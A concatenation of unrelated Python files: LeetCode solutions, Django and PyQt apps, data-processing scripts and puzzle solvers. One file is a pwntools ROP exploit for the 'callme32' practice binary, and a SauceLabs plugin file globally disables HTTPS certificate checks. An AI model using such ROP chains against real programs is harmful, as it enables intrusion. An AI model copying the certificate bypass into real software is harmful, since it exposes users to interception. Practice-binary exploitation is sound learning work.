        dp[0] = nums[0]
        for i in range(1, len(nums)):
            # either skip house i, or rob it on top of the best up to i-2
            # (for i == 1, dp[i-2] is dp[-1], which is still 0 at this point)
            dp[i] = max(dp[i-1], dp[i-2] + nums[i])
        return dp[-1]
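# Hypothetical quick check (outside the LeetCode harness):
# Solution().rob([2, 7, 9, 3, 1]) == 12, i.e. rob the houses worth 2 + 9 + 1.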
|
# Generated by Django 2.0.5 on 2018-06-04 08:14
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
dependencies = [
('calculation', '0012_auto_20180604_0807'),
]
operations = [
migrations.AlterField(
model_name='menu',
name='dish',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.PROTECT, related_name='menu_dish', to='calculation.Dish', verbose_name='блюдо'),
),
migrations.AlterField(
model_name='menu',
name='food_intake',
field=models.PositiveIntegerField(choices=[(1, 'Завтрак'), (2, 'Обед'), (3, 'Полдник'), (4, '1-й ужин'), (5, '2-й ужин')], db_index=True, verbose_name='приём пищи'),
),
migrations.AlterField(
model_name='menu',
name='out',
field=models.CharField(blank=True, max_length=255, null=True, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')], verbose_name='выход порции'),
),
]
|
from django.contrib import admin
from TestModel.models import myDevice, Task
# Register your models here.
admin.site.site_header = 'WELCOME'
admin.site.site_title = 'WELCOME'
class devicesDisplay(admin.ModelAdmin):
list_display = ('host_name', 'tag') # list
class tasksDisplay(admin.ModelAdmin):
list_display = ('id', 'name', 'progress', 'Owner', 'tag', 'status', 'm_time') # list
admin.site.register(myDevice, devicesDisplay)
admin.site.register(Task, tasksDisplay)
|
__author__ = 'luca'
from PyQt4.QtCore import *
from PyQt4.QtGui import QPixmap
class QAnalyzedFramesTimelineListModel(QAbstractListModel):
def __init__(self, video, discared_frames):
self.video = video
self._discared_frames = discared_frames
self.pixmaps = {}
super(QAnalyzedFramesTimelineListModel, self).__init__()
def rowCount(self, parent):
return self.video.frames_count()
def data(self, index, role):
if role == Qt.DisplayRole:
if not self.pixmaps.has_key(index.row()):
                # Check if the frame is discarded; if so create a blank pixmap
if int(index.row()) in self._discared_frames:
#Blank frame
pixmap = QPixmap(1, 1).scaled(self.video.width(), self.video.height())
pixmap.fill(Qt.black)
else:
frame = self.video.frames[index.row()]
pixmap = QPixmap(frame.path())#.scaled(200, 100, Qt.KeepAspectRatio)
self.pixmaps[index.row()] = pixmap
return self.pixmaps[index.row()]
else:
return QVariant()
|
num_set = {1, 2, 3, 4, 5}
print(1 in num_set)
print(8 in num_set)
|
import random
def read_words(filename='20k.txt'):
''' Read file of most popular english words'''
with open(filename) as words_file:
words = words_file.read()
words = [word for word in words.split('\n') if
len(word) > 5]
return words
def choose_random_word(words):
''' Choose random word from list '''
return random.choice(words)
print(choose_random_word(read_words()))
word = choose_random_word(read_words())
print(word)
guesses = 8
alfabetic = 'abcdefghijklmnopqrstuvwxyz'
print('Welcome to the game, Hangman!')
print('I am thinking of a word that is %d letters long.' % len(word))
print('____________')
print('You have %d guesses left' % guesses)
print(alfabetic)
|
def get_next(pattern):
    '''
    Compute the "next" (failure) array used by the KMP string-matching algorithm.
    '''
    m, k, j = len(pattern), -1, 0
    if m == 0:
        return []
    next = [0] * m  # pre-allocate so next[j] can be assigned below
    next[0] = -1
    while j < m-1:
        if k == -1 or pattern[j] == pattern[k]:
            k += 1
            j += 1
            next[j] = k
        else:
            k = next[k]
    return next
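# Quick sanity check (hypothetical usage; with this convention next[0] is -1 and
# next[j] is the length of the longest proper prefix of pattern[:j] that is also
# its suffix):
if __name__ == '__main__':
    print(get_next("ababc"))  # expected: [-1, 0, 0, 1, 2]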
|
from django.db import models
from os import path  # path.basename is used in CsvPath.__str__ below
class TableField(models.Model):
model_id = models.IntegerField(primary_key=True, verbose_name='Порядковый номер')
name = models.CharField(max_length=64, verbose_name='Имя')
width = models.IntegerField(verbose_name='Ширина')
class CsvPath(models.Model):
csvPath = models.CharField(max_length=200, verbose_name='Путь к файлу')
class Meta:
verbose_name = 'Путь к файлу'
verbose_name_plural = 'Пути к файлам'
def get_path(self):
return self.csvPath
def set_path(self, new_path):
self.csvPath = new_path
self.save()
def save(self, *args, **kwargs):
obj = CsvPath.objects.all()
if obj.count() == 0 or self.pk == 1:
super(CsvPath, self).save(*args, **kwargs)
def __str__(self):
return path.basename(self.csvPath)
|
from django.urls import path
from .views import *
urlpatterns = [
path('messages/', list_of_messages, name='list_of_messages'),
path('messages/update/<int:pk>/', update_message, name='update_message'),
path('messages/updated_messages/', updated_messages, name='updated_messages'),
path('cancel_update_message/<int:pk>/', cancel_update_message, name='cancel_update_message'),
path('categories/', list_of_categories, name='list_of_categories'),
    path('categories/add/', CategoryAddView.as_view(), name='categories_add'),
    path('categories/delete/<int:pk>/', CategoryDeleteView.as_view(), name='categories_delete'),
    path('categories/update/<int:pk>/', CategoryUpdateView.as_view(), name='categories_update'),
    path('kinds/', list_of_kinds, name='list_of_kinds'),
    path('kinds/add/', KindAddView.as_view(), name='kinds_add'),
    path('kinds/delete/<int:pk>/', KindDeleteView.as_view(), name='kinds_delete'),
    path('kinds/update/<int:pk>/', KindUpdateView.as_view(), name='kinds_update'),
    path('list_of_products/', list_of_products, name='list_of_products'),
    path('list_of_products/add/', ProductAddView.as_view(), name='product_add'),
    path('list_of_products/delete/<int:pk>/', ProductDeleteView.as_view(), name='product_delete'),
    path('list_of_products/update/<int:pk>/', ProductUpdateView.as_view(), name='product_update'),
]
|
from torch.utils.data import Dataset, DataLoader
import numpy as np
import json
from transformers import BertTokenizer
class myDataset(Dataset):
    # x: input token-id sequences; y: sentiment labels; mask: attention-mask matrix
def __init__(self, x, y, mask):
super(myDataset, self).__init__()
self.sample_num = x.shape[0]
self.x = x
self.y = y
self.mask = mask
def __getitem__(self, index):
return self.x[index], self.y[index], self.mask[index]
def __len__(self):
return self.sample_num
def DataProcess():
filename = 'data/test.json'
content_test,label_test = make_data_json(filename)
tokenizer = BertTokenizer.from_pretrained("bert-base-chinese")
test_tokenized = list(
map((lambda x: tokenizer.encode(x, add_special_tokens=True, max_length=512, truncation=True)), content_test))
test_padded = pad(test_tokenized)
test_attention_mask = np.where(test_padded != 0, 1, 0)
test_loader = DataLoader(dataset=myDataset(test_padded, label_test, test_attention_mask), batch_size=8)
print("Data processing done!")
return test_loader
def make_data_json(filename):
with open(filename, 'r') as f:
data_all = json.load(f)
content = []
label = []
if filename != 'data/test_data.json':
for data in data_all:
content.append(data['content'])
label.append(0)
return content, np.array(label)
def pad(tokenized):
max_len = 0
for i in tokenized:
if len(i) > max_len:
max_len = len(i)
max_len = min(max_len, 512)
padded = []
for i in tokenized:
if len(i) < max_len:
padded.append(i + [0] * (max_len - len(i)))
else:
padded.append(i[0: max_len])
return np.array(padded)
if __name__ == '__main__':
DataProcess()
|
def main():
print("This is the ops.py file.")
list = []
list = [1,2,3,4,5,6,7,8,9,10]
print("list = {}".format(list))
print("list[0] = {}".format(list[0]))
print("list[1] = {}".format(list[1]))
print("list[9] = {}".format(list[9]))
print("list[0:5] = {}".format(list[0:5]))
#list = range(0,100)
#print(list)
list[:] = range(0,100)
print(list)
# 3 possible arguments for slice
# 1 argument version
print("list[27] = {}".format(list[27]))
print("list[27:42] = {}".format(list[27:42]))
    # Stepping across does not include index 42 since the slice end is non-inclusive
print("list[27:42:3] = {}".format(list[27:42:3]))
print("list[27:42:3] = [99,99,99,99,99]")
list[27:42:3] = [99,99,99,99,99]
print("list = {}".format(list))
if __name__ == "__main__": main()
|
'''
Created on 1 abr. 2020
REVISTAS
@author: goyo
'''
from PyQt5 import QtCore, QtGui, QtWidgets
from ventanas import ventana_list_revistas, ventana_listado_revistas, ventana_menu_revistas, ventana_principal, ventana_registro_revistas , ventana_editar_revistas
from modulo.clases import Revista
from modulo import operaciones
from PyQt5.Qt import QMessageBox, QTableWidgetItem, QPushButton
import sys
from _functools import partial
lista_resultado = None
def registrar_revistas():
revista = Revista()
revista.titulo = ui_registrar_revistas.entrada_titulo_revista.text()
revista.precio = ui_registrar_revistas.entrada_precio_revista.text()
revista.distribuidora = ui_registrar_revistas.entrada_ditribuidor_revista.text()
revista.numero_revista = ui_registrar_revistas.entrada_numero_revista.text()
revista.date_entrega = ui_registrar_revistas.entrada_date_entrega.text()
revista.date_devolucion = ui_registrar_revistas.entrada_date_devolucion.text()
#revista.dascatalogado = ui_registrar_revistas.checbox_descatalogado.text()
if ui_registrar_revistas.checbox_descatalogado.isChecked():
revista.dascatalogado = True
indice_selecionado = ui_registrar_revistas.combo_extra.currentIndex()
revista.extra = ui_registrar_revistas.combo_extra.itemText(indice_selecionado)
#revista.periodicidad = ui_registrar_revistas.radio_semanal.text()
#revista.periodicidad = ui_registrar_revistas.radio_mensual.text()
#revista.periodicidad = ui_registrar_revistas.radio_anual.text()
if ui_registrar_revistas.radio_semanal.isChecked():
revista.periodicidad = "semanal"
if ui_registrar_revistas.radio_mensual.isChecked():
revista.periodicidad = "mensual"
if ui_registrar_revistas.radio_anual.isChecked():
revista.periodicidad = "anual"
try:
operaciones.registro_revistas(revista)
except Exception as e:
print(e)
QMessageBox.about(MainWindow,"Info","Registro de Revista OK")
def mostrar_registro_revistas():
ui_registrar_revistas.setupUi(MainWindow)
ui_registrar_revistas.entrada_registrar_revista.clicked.connect(registrar_revistas)
def mostrar_listado_revistas():
ui_listar_revistas.setupUi(MainWindow)
lista_resultados = operaciones.obtener_revista()
texto = ""
for l in lista_resultados:
texto +=("id :" + str(l[0]) + "titulo : " + l[1]
+ "precio : " + str(l[2]) + "distribidora : "
+ l[3] + "numero de revista : " + str(l[4])
+ "Fecha de entrega : " + str(l[5]) + "Fecha de devolucion :"
+ str(l[6]) + " Descatalogada : " + l[7] + " Extra : " + l[8]
+ " Periodicidad : " + l[9]+"\n")
ui_listar_revistas.listado_revistas.setText(texto)
    ui_ventana_list_revistas.listWidget.itemClicked.connect(mostrar_registro)
def mostrar_registro():
indice_selecionado = ui_ventana_list_revistas.listWidget.currentRow()
QMessageBox.about(MainWindow,"Info","mostrar la informacion del elemento : " + str(indice_selecionado))
def mostrar_list_widget():
global lista_resultado
ui_ventana_list_revistas.setupUi(MainWindow)
lista_resultado = operaciones.obtener_revista()
for l in lista_resultado:
ui_ventana_list_revistas.listWidget.addItem(" titulo : " + l[1] + " precio : "
+ str(l[2]) + " distribidora : " + l[3] + " numero de revista : "
+ str(l[4]) + " Fecha de entrega : " + str(l[5]) + " Fecha de devolucion : " + str(l[6]) +
" Descatalogada : " + l[7] + " Extra : " + l[8] + " Periodicidad : " + l[9])
ui_ventana_list_revistas.listWidget.itemClicked.connect(mostrar_registros)
def mostrar_registros():
indice_selecionado = ui_ventana_list_revistas.listWidget.currentRow()
texto = ""
texto += "titulo : " + lista_resultado[indice_selecionado][1]+"\n"
texto += "precio : " + str(lista_resultado[indice_selecionado][2])+"\n"
texto += "distribuidora : " + lista_resultado[indice_selecionado][3]+"\n"
texto += "numero de revista : " + str(lista_resultado[indice_selecionado][4])+"\n"
texto += "Fecha de entrega : " + str(lista_resultado[indice_selecionado][5])+"\n"
texto += "Fecha de devolucion : " + str(lista_resultado[indice_selecionado][6])+"\n"
texto += "Descatalogada : " + lista_resultado[indice_selecionado][7]+"\n"
texto += "Extra : " + lista_resultado[indice_selecionado][8]+"\n"
texto += "Periodicidad : " + lista_resultado[indice_selecionado][9]
QMessageBox.about(MainWindow,"Info",texto)
def mostrar_menu_revistas():
ui_ventana_menu_revistas.setupUi(MainWindow)
revistas = operaciones.obtener_revista()
fila = 0
for l in revistas:
ui_ventana_menu_revistas.tabla_revistas.insertRow(fila)
columna_indice = 0
for valor in l:
celda = QTableWidgetItem(str(valor))
ui_ventana_menu_revistas.tabla_revistas.setItem(fila,columna_indice,celda)
columna_indice += 1
boton_borrar = QPushButton("borrar")
boton_borrar.clicked.connect(partial(borrar_revista,l[0]))
ui_ventana_menu_revistas.tabla_revistas.setCellWidget(fila,7,boton_borrar)
boton_editar = QPushButton("editar")
boton_editar.clicked.connect(partial(editar_revistas,l[0],l[1]))
ui_ventana_menu_revistas.tabla_revistas.setCellWidget(fila,8,boton_editar)
fila +=1
def editar_revistas(id,titulo):
QMessageBox.about(MainWindow,"info","vas a editar el registro con id : " + str(id) + " titulo : " + titulo)
ui_ventana_editar_revistas.setupUi(MainWindow)
revista_a_editar = operaciones.obtener_revista_por_id(id)
ui_ventana_editar_revistas.entrada_titulo_revista.setText(revista_a_editar.titulo)
ui_ventana_editar_revistas.entrada_precio_revista.setText(str(revista_a_editar.precio))
ui_ventana_editar_revistas.entrada_ditribuidor_revista.setText(str(revista_a_editar.distribuidora))
ui_ventana_editar_revistas.entrada_numero_revista.setText(str(revista_a_editar.numero_revista))
ui_ventana_editar_revistas.entrada_date_entrega.setText(revista_a_editar.date_entrega)
ui_ventana_editar_revistas.entrada_date_devolucion.setText(revista_a_editar.date_devolucion)
ui_ventana_editar_revistas.boton_guardar_cambios_revista.clicked.connect(partial(guardar_cambios_revista,revista_a_editar.id))
def guardar_cambios_revista(id):
QMessageBox.about(MainWindow,"Info","guardar cambios sobre el registro de id :" + str(id))
revista_guardar_cambios = Revista()
revista_guardar_cambios.titulo = ui_ventana_editar_revistas.entrada_titulo_revista.text()
revista_guardar_cambios.precio = ui_ventana_editar_revistas.entrada_precio_revista.text()
revista_guardar_cambios.distribuidora = ui_ventana_editar_revistas.entrada_ditribuidor_revista.text()
revista_guardar_cambios.numero_revista = ui_ventana_editar_revistas.entrada_numero_revista.text()
revista_guardar_cambios.date_entrega = ui_ventana_editar_revistas.entrada_date_entrega.text()
revista_guardar_cambios.date_devolucion = ui_ventana_editar_revistas.entrada_date_devolucion.text()
revista_guardar_cambios.id = id
try:
operaciones.guardar_cambios_revista(revista_guardar_cambios)
except Exception as e:
print(e)
mostrar_menu_revistas()
def borrar_revista(id):
QMessageBox.about(MainWindow,"Info","vas a borrar un registro " + str(id))
operaciones.borrar_revista(id)
mostrar_menu_revistas()
def mostrar_inicio():
ui.setupUi(MainWindow)
ui.submenu_registrar_revistas.triggered.connect(mostrar_registro_revistas)
ui.submenu_listar_revistas.triggered.connect(mostrar_listado_revistas)
ui.submenu_inicio.triggered.connect(mostrar_inicio)
ui.submenu_list_widget.triggered.connect(mostrar_list_widget)
ui.submenu_table_widget.triggered.connect(mostrar_menu_revistas)
# end of helper functions
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = ventana_principal.Ui_ventana_principal()
ui_registrar_revistas = ventana_registro_revistas.Ui_MainWindow()
ui_listar_revistas = ventana_listado_revistas.Ui_ventana_listado_revistas()
ui_ventana_list_revistas = ventana_list_revistas.Ui_MainWindow()
ui_ventana_menu_revistas = ventana_menu_revistas.Ui_MainWindow()
ui_ventana_editar_revistas = ventana_editar_revistas.Ui_MainWindow()
ui.setupUi(MainWindow)
ui.submenu_registrar_revistas.triggered.connect(mostrar_registro_revistas)
ui.submenu_listar_revistas.triggered.connect(mostrar_listado_revistas)
ui.submenu_inicio.triggered.connect(mostrar_inicio)
ui.submenu_list_widget.triggered.connect(mostrar_list_widget)
ui.submenu_table_widget.triggered.connect(mostrar_menu_revistas)
MainWindow.show()
sys.exit(app.exec_())
|
from django.contrib import messages
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import ListView, CreateView, UpdateView, DeleteView
from notes.forms import NotesForm
from notes.models import Notes
class NotesIndex(ListView):
model = Notes
context_object_name = 'all_notes'
template_name = 'notes/notes_index.html'
class CreateNotesView(CreateView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
class UpdateNotesView(UpdateView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
class DeleteNotesView(DeleteView):
model = Notes
template_name = 'notes/notes_form.html'
form_class = NotesForm
def get_success_url(self):
return reverse('notes:index')
def logout_request(request):
logout(request)
messages.info(request, "Logged out successfully!")
return redirect("login")
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=raw_password)
login(request, user)
return redirect('notes:index')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {'form': form})
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def findTarget(self, root, k):
"""
:type root: TreeNode
:type k: int
:rtype: bool
"""
result = self.helper_find_target(root, k)
print(result)
        return bool(result[1])
def helper_find_target(self, node, k, compliments=None, pairs=None):
"""
Helper function to traverse the tree and find the pairs
"""
if compliments is None and pairs is None:
# to store the compliments
compliments = set()
# to store all the pairs
pairs = []
if node is None:
return False, pairs
# check if node.val is in compliments set
if node.val in compliments:
pairs.append((node.val, k-node.val))
return True, pairs
# otherwise we add the val into the compliments
compliments.add(k-node.val)
left = self.helper_find_target(node.left, k, compliments, pairs)
right = self.helper_find_target(node.right, k, compliments, pairs)
        return left[0] or right[0], pairs
root = TreeNode(4)
root.left = TreeNode(2)
root.right = TreeNode(6)
root.left.left = TreeNode(1)
root.left.right = TreeNode(3)
root.right.left = TreeNode(5)
root.right.right = TreeNode(18)
tree = Solution()
result = tree.findTarget(root, 19)
print(result)
|
#!/home/boyuanli/tools/anaconda2/envs/python35/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 25 16:34:27 2019
@author: lbybyl
this file is used to find the most covered 50 bp window; the statistics for
selecting significant promoters and for the pausing signal over the 50 bp
windows should be done in R, because R is more convenient for that
input: the significant promoters already selected with R
"""
import click
import os.path
import sys
import os
import pandas as pd
import numpy as np
@click.command()
@click.option('--inputfile', "-i", required=True , help='the input file name you want find max 50bp window')
@click.option('--outputprefix', "-p", required=True ,help='output prefix')
#@click.option('--first-par', "-a", default = "" , help='should be Var_name,Short_name,is_requrie,type [optional]')
def main(inputfile, outputprefix):
"""
inputfile example:
chr1 4806822 4808822 NM_008866 0 + chr1 4806822 4806847 26 0 + 25
    it is produced by bedtools intersect between the promoter regions and the reads;
    this script finds the max 50 bp window and its read count for a file like the one above;
"""
filname=inputfile
outputname=outputprefix
file = open(filname,'r')
gene_dir = {}
gene_info = {}
line_split = []
for line in file:
line_split = line.split('\t')
if line_split[5]=="+":
try:
gene_dir[line_split[3]].append(line_split[7])
except KeyError:
gene_info[line_split[3]] = line_split[0:6]
gene_dir[line_split[3]] = [line_split[7]]
elif line_split[5]=="-":
try:
gene_dir[line_split[3]].append(line_split[8])
except KeyError:
gene_info[line_split[3]] = line_split[0:6]
gene_dir[line_split[3]] = [line_split[8]]
file.close()
"""
    Add the marker positions to the list corresponding to each gene and then
    find the most significant 50 bp window for each active promoter.
    At this point there are two dicts: one holds every gene's mapped read
    positions; the other holds every gene's common info (chr, st, en, id, 0, strand).
    Process: for each gene, append the marker positions to its list and sort it;
    take the index of each appended marker, difference the indices with the
    window/step as the stride, and take the maximum of the resulting list.
    From that index, st_region = gene_st + (index + 1) * sp and en_region = st_region + 50
    (see the worked sketch after this docstring).
    Output: format the 50 bp region data as chr, st, en, id, 0, strand, reads_num.
"""
sp=5 # sliding steps
windwos=10 # 10*sp
gene_window = {}
gene_window_readsnum = {}
gene_max_window = {}
for i in gene_dir.keys():
try:
ex_list=produce_list(gene_info[i][1],gene_info[i][2],sp)
except IndexError:
print('i=',i)
            print(gene_info[i])
sys.exit(3)
try:
gene_dir[i] = gene_dir[i] + ex_list
gene_dir[i]=list(map(int,gene_dir[i]))
gene_dir[i].sort()
except AttributeError:
print(gene_dir[i])
sys.exit(4)
except TypeError:
print(type(gene_dir[i]))
print(gene_dir[i])
sys.exit(4.1)
try:
gene_window[i]=got_eleindex_for_list(gene_dir[i],ex_list)
except TypeError:
print('i=',i)
print(gene_dir[i])
sys.exit(5)
try:
gene_window_readsnum[i]=got_list_diff(gene_window[i],windwos)
except TypeError:
print(gene_window[i])
print(type(gene_window[i]))
sys.exit(7)
gene_max_window[i]=[max(gene_window_readsnum[i])]
max_idx=gene_window_readsnum[i].index(max(gene_window_readsnum[i]))
wi_st=int(gene_info[i][1])+(max_idx+1)*sp
tmp_list=[gene_info[i][0],wi_st,wi_st+50,gene_info[i][3],gene_info[i][4],gene_info[i][5]]
gene_max_window[i]=gene_max_window[i]+tmp_list
save_file(gene_max_window,outputname)
def produce_list(st,en,sp):
st=int(st)
en=int(en)
li = [x for x in range(st,en+sp,sp)]
return li
def got_eleindex_for_list(li_all,li_sub):
"""
input a list and a sub list and return the elements index of
the sulist in the list
"""
li_index=[]
li_all=list(map(int,li_all))
for i in li_sub:
li_index.append(li_all.index(i))
return li_index
def got_list_diff(li,sp):
li_diff=[]
len_li=len(li)
for i in range(0,len_li):
if i+sp < len_li:
li_diff.append(li[i+sp]-li[i]-sp)
return li_diff
def save_file(dict_data,outputname):
dict_data_df = pd.DataFrame(dict_data)
dict_data_df = dict_data_df.T
dict_data_df.to_csv(outputname,index=False,sep="\t")
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from .plugin import SauceLabs
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
__all__ = ["SauceLabs"]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
backend_list = [("9pk.118sh.com", "113.105.175.243")]
BACKEND_DICT = dict()
AccessList = map(lambda x:x[0], backend_list)
def get_backend(host):
return BACKEND_DICT.get(host)
def init():
for (host, ip) in backend_list:
BACKEND_DICT.setdefault(host, ip)
init()
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
elf = ELF('callme32')
callme_one = elf.symbols['callme_one']
callme_two = elf.symbols['callme_two']
callme_three = elf.symbols['callme_three']
# ROPGadget --binary callme32
pop3ret = 0x080488a9 # pop esi ; pop edi ; pop ebp ; ret
if __name__ == '__main__':
proc = elf.process()
payload = 11 * b'AAAA'
payload += p32(callme_one)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
payload += p32(callme_two)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
payload += p32(callme_three)
payload += p32(pop3ret)
payload += p32(1) + p32(2) + p32(3)
proc.recvuntil('>')
proc.sendline(payload)
proc.recvall()
|
# import time
# user_data = {}
# for i in range(10000):
# activity = input("Login or Sign up?\n>>").lower()
# if activity == 'login':
# email = input("Enter your email\n>>")
# password = input("Enter your password\n>>")
# time.sleep(2)
# if email in user_data.keys():
# actual_password = user_data.get(email)
# if actual_password == password:
# print('Login successful')
# break
# else:
# print("Please enter a valid email and password.")
# else:
# print("There is no active user with thie email")
# elif activity == 'sign up':
# for i in range(10000):
# email = input("Enter your email\n>>")
# password = input("Enter your password\n>>")
# re_password = input("Confirm password \n>>")
# special_char = ['#', '@', '$']
# isValid = True
# if password != re_password:
# print("Please enter matching passwords")
# continue
# if (len(password) < 6) or (len(password) > 16):
# print ("Password length should not be less than 6")
# isValid = False
# elif not any(char.isdigit() for char in password):
# print("Password should at least contain a number")
# isValid = False
# elif not any(char.islower() for char in password):
# print("Password should contain at least a lowercase letter [a-z]")
# isValid = False
# elif not any(char.isupper() for char in password):
# print("Password should contain at least an uppercase letter [A-Z]")
# isValid = False
# elif not any(char in special_char for char in password):
# print("Password should contain at least a special character [@#$]")
# isValid = False
# continue
# else:
# user_data[email] = password
# break
# con = input("Press 'y' to continue and any other key to quit\n>>")
# if con == 'y':
# continue
# else:
# break
# else:
# print("Please select a valid option")
|
# -*- coding: utf-8 -*-
#############################################################################
# Copyright Vlad Popovici <popovici@bioxlab.org>
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
__author__ = "Vlad Popovici <popovici@bioxlab.org>"
__version__ = 0.1
import argparse as opt
import numpy as np
import glob
import os, os.path
import logging
import warnings
import re
from skimage.io import imread, imsave
import qpath.stain.norm
from qpath.core import NumpyImage
warnings.simplefilter("ignore", UserWarning)
def main():
p = opt.ArgumentParser(description="Builds a stain normalization model based on a set of example images.")
p.add_argument("img_path", action="store", help="an image or a folder images (jpeg, tiff or png) to be normalized")
p.add_argument("model_file", action="store", help="file with the normalization model")
p.add_argument("dst_path", action="store", help="destination folder where to save the image(s)")
p.add_argument("-m", "--method", action="store", choices=["macenko", "vahadane", "reinhard"],
default="reinhard", help="normalization method")
p.add_argument("-p", "--prefix", action="store", default="",
help="add a prefix to the name of the normalized image (helpful when saving in the same folder)")
args = p.parse_args()
logging.captureWarnings(True)
logger = logging.getLogger('QPATH')
logger.setLevel(logging.DEBUG)
logger_handler = logging.FileHandler(args.dst_path + os.path.sep + 'qpath.log')
logger_handler.setLevel(logging.DEBUG)
logger.addHandler(logger_handler)
logger.info("========= Apply HE normalization model =========")
flist = list()
if os.path.isdir(args.img_path):
logger.info("Processing all images in " + args.img_path)
flist.extend(glob.glob(args.img_path + os.path.sep + "*.jpeg"))
flist.extend(glob.glob(args.img_path + os.path.sep + "*.tiff"))
flist.extend(glob.glob(args.img_path + os.path.sep + "*.png"))
logger.info("Found {:d} images".format(len(flist)))
elif os.path.exists(args.img_path) and (args.img_path.endswith(".jpeg") or
args.img_path.endswith(".png") or args.img_path.endswith(".tiff")):
logger.info("Single image to process.")
flist = [args.img_path]
else:
raise RuntimeError("Cannot find the specified folder/file.")
# read model:
nrm = None
if args.method.lower() == "macenko":
nrm = qpath.stain.norm.MacenkoNormalizer()
elif args.method.lower() == "vahadane":
nrm = qpath.stain.norm.VahadaneNormalizer()
elif args.method.lower() == "reinhard":
nrm = qpath.stain.norm.ReinhardNormalizer()
else:
logger.info("Unknown normalizer")
raise RuntimeError("Unknown normalizer")
nrm.load(args.model_file)
for f in flist:
img = imread(f)
img_n = nrm.apply(img)
imsave(args.dst_path + os.path.sep + args.prefix + os.path.basename(f), img_n)
return
if __name__ == "__main__":
main()
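# Hedged invocation sketch (the script name and the paths below are placeholders):
#   python apply_stain_norm.py ./tiles ./he_model.dat ./normalized --method reinhard --prefix norm_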
|
#!/usr/bin/python3
# syntax.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
print("This is the syntax.py file.")
# This gives the ability to call functions before they are defined:
# main() is only invoked at the end of the file, so by then all
# functions have been declared.
if __name__ == "__main__": main()
|
import itertools
from tqdm import tqdm
def play(num_players, last_marble):
players = itertools.cycle(range(num_players))
scores = [0 for _ in range(num_players)]
current_player = next(players)
marbles = [0]
current_index = 0
for marble in tqdm(range(1, last_marble + 1)):
current_player = next(players)
if marble % 23 == 0:
remove_index = (current_index - 7) % len(marbles)
scores[current_player] += marble + marbles.pop(remove_index)
current_index = remove_index
else:
next_index = (current_index + 2) % len(marbles)
marbles.insert(next_index, marble)
current_index = next_index
return max(scores)
def part_1():
# return play(9, 25)
# return play(10, 1618)
return play(411, 71170)
def part_2():
return play(411, 71170 * 100)
if __name__ == '__main__':
print(f'Part 1: {part_1()}')
print(f'Part 2: {part_2()}')
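# Note: list.insert()/pop() near the middle of a long list is O(n), so part 2
# (over 7 million marbles) is slow with the approach above.  A common speed-up
# (a hedged sketch, not part of the original solution) keeps the circle in a
# collections.deque and rotates it so every move is O(1):
#
#   from collections import deque
#
#   def play_fast(num_players, last_marble):
#       scores = [0] * num_players
#       circle = deque([0])
#       for marble in range(1, last_marble + 1):
#           if marble % 23 == 0:
#               circle.rotate(7)
#               scores[marble % num_players] += marble + circle.pop()
#               circle.rotate(-1)
#           else:
#               circle.rotate(-1)
#               circle.append(marble)
#       return max(scores)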
|
import numpy as np
import pandas as pd
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from sklearn.linear_model import Lasso
from sklearn.preprocessing import PolynomialFeatures
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
df = pd.read_csv("week3.csv")
print(df.head())
x = np.array(df.iloc[:, 0:2])
x1 = np.array(df.iloc[:, 0]) #to plot the x_axis
x2 = np.array(df.iloc[:, 1])
y = np.array(df.iloc[:, 2])
#plot original data
fig1 = plt.figure(figsize=(17,12))
ax = fig1.add_subplot(111, projection='3d')
ax.scatter(x1, x2, y, label='original data', color='red')
plt.title("original data")
ax.set_xlabel('x1')
ax.set_ylabel('x2')
ax.set_zlabel('y')
plt.legend(loc='upper right',fontsize=5)
#plt.show()
poly = PolynomialFeatures(degree=5, interaction_only=False,include_bias=False)
x_poly = poly.fit_transform(x)
#(c)
""" Because original data x1,x2 lies in (-1,1),
so I choose to generate array of range (-1,1), and then use PolynomialFeatures to transform the Xtest."""
Xtest =[]
grid=np.linspace(-1.5,1.5) #Return evenly spaced numbers over a specified interval.
for i in grid:
for j in grid:
Xtest.append([i,j])
Xtest=np.array(Xtest)
poly_test = PolynomialFeatures(degree=5, interaction_only=False,include_bias=False)
x_poly_test = poly_test.fit_transform(Xtest)
fig2=plt.figure(figsize=(17,12))
"""Then I define a figure object to plot all the models using add_subplot function.
The value of z axis is the prediction of lasso when input is the Xtest transformed ."""
#train the range of different alpha for linear lasso regression model
for inx,C in enumerate([0.001,0.01,0.1,1,10,100,1000]):
